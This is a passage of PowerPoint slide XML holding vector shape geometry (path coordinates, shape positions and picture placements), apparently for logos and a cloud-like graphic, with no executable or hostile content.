                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254616" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254504" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252159" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="289826" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266905" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287855" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311264" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317600" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301530" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289826" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="341969" y="48503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325000" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338879" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362064" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368636" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349262" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341969" y="48503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="335424" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="316080" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301530" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317600" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325000" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341969" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335424" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="383197" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360764" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349262" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368636" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383197" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462550" y="39339"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429060" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433591" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439728" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441272" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441272" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434831" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428633" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394780" y="69920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394832" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396974" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405911" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406210" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411137" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420342" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422882" y="96031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425829" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423817" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421216" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420119" y="79897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419184" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418209" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417599" y="77439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417111" y="75671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416990" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417579" y="69250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418717" y="67929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419875" y="66629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421541" y="65613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423736" y="64942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425504" y="64373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428125" y="63885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434993" y="63032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438204" y="62707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462550" y="39339"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462812" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441150" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462812" y="62463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441150" y="62463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439443" y="78069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437472" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432369" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431716" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430767" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="62463"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="427617" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422395" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417193" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406789" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403030" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400733" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400733" y="44195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402725" y="44195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404513" y="43504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407439" y="42529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415368" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415133" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419469" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462550" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460048" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454521" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449740" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443660" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436615" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437452" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427617" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="507292" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="485387" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485387" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507292" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507292" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="551062" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529137" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529137" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551062" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5510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12C64A57-8DA2-E84E-6BC4-A48E46B6D886}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4818929" y="2993075"/>
              <a:ext cx="1285240" cy="821690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1285239" h="821689">
                  <a:moveTo>
                    <a:pt x="538580" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498911" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477551" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456191" y="9111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447037" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436357" y="15186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389059" y="41002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350916" y="74412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344813" y="83524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338710" y="91117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332607" y="100229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328030" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323453" y="116934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317350" y="126046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314299" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308196" y="154900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305144" y="165530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303619" y="174642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300567" y="195902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300567" y="223238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291413" y="224756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280733" y="226275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271578" y="229312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260898" y="232350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253270" y="236905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244115" y="242980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236487" y="247536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212075" y="277908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="314355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198344" y="326504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="332579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199869" y="341691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189189" y="338653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176984" y="335616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164778" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154098" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106800" y="341691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54926" y="367507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25937" y="397880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6102" y="435846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="463181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10680" y="534556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33565" y="569485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67131" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79337" y="605932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93069" y="610488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106800" y="616562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122057" y="619600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137315" y="621118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154098" y="622637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163252" y="622637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173932" y="621118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173932" y="634786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175458" y="643898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175458" y="653009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178509" y="662121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180035" y="669714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186138" y="687938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190715" y="695531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195292" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224281" y="741090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254795" y="766906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289887" y="786649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329556" y="800316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363122" y="806391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373802" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384482" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396688" y="809428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408894" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421099" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445511" y="804872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457717" y="801835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479077" y="795760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491283" y="792723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500437" y="788167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511117" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520272" y="777537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529426" y="771462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540106" y="765388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547735" y="759313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556889" y="753239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564518" y="745646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570620" y="753239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578249" y="762351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585878" y="768425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595032" y="776018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604186" y="782093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613341" y="789686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624021" y="794242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636227" y="800316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648432" y="804872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660638" y="807909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674370" y="812465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701833" y="818540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715564" y="820058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729296" y="820058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744553" y="821577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782696" y="818540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834571" y="806391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880343" y="786649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903228" y="768425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913908" y="759313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935269" y="727422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942897" y="703124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950526" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956629" y="706161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982566" y="706161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991720" y="704643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002400" y="703124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011555" y="700087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020709" y="695531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035966" y="686419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042069" y="678826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049698" y="672752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055801" y="666677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060378" y="659084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063429" y="649972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068007" y="642379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="633267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="624155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="615044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="602895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069532" y="592264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080212" y="593783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092418" y="595302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103098" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115304" y="596820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165653" y="589227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209899" y="571003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255671" y="531519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263299" y="517852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270928" y="505703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277031" y="492035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283134" y="461662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284659" y="446476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283134" y="431290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270928" y="388768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244991" y="350802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209899" y="323467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196167" y="314355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180910" y="308281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165653" y="303725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148870" y="299169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115304" y="296132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104624" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093944" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083264" y="299169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="302206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072584" y="262722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071058" y="250573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069532" y="239943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066481" y="229312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063429" y="220201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060378" y="209570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051224" y="188309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042069" y="170086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035966" y="160974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029864" y="153381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023761" y="144269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016132" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010029" y="129083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002400" y="121490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994772" y="115415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987143" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968835" y="95673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930691" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868137" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857457" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837622" y="65300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819314" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801005" y="72894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782696" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749130" y="92636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735399" y="103266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720141" y="113897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704884" y="89599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695730" y="78968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686576" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665215" y="48596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653010" y="39484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639278" y="30372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625547" y="24298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613341" y="18223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598083" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584352" y="7593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569095" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538580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98AB3CA1-70E6-3E26-85C0-2354EBB1DDD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9443" y="3012817"/>
              <a:ext cx="1209899" cy="754757"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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304C441A-6DEF-6EAF-F210-1AD22E7803A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9774" y="2984329"/>
              <a:ext cx="1303009" cy="839470"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C16591CB-1B4C-7DC6-AD4E-140C1F3FDF4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6355039" y="2170287"/>
              <a:ext cx="86360" cy="466725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="86360" h="466725">
                  <a:moveTo>
                    <a:pt x="19631" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64934" y="454558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86075" y="466599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19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4" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DF36A3D-8EBE-17ED-92DE-4C2D30B923A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0140" y="2067936"/>
              <a:ext cx="662932" cy="565939"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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075C9ED5-D9EC-A36E-1676-329A6E619CDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6365005" y="2062678"/>
              <a:ext cx="673735" cy="576580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="673734" h="576580">
                  <a:moveTo>
                    <a:pt x="602388" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="105421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70805" y="576433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105039" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79079" y="570529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73826" y="566748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78392" y="565961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10384" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5918" y="113569"/>
                  </a:lnTo>
                  <a:lnTo>
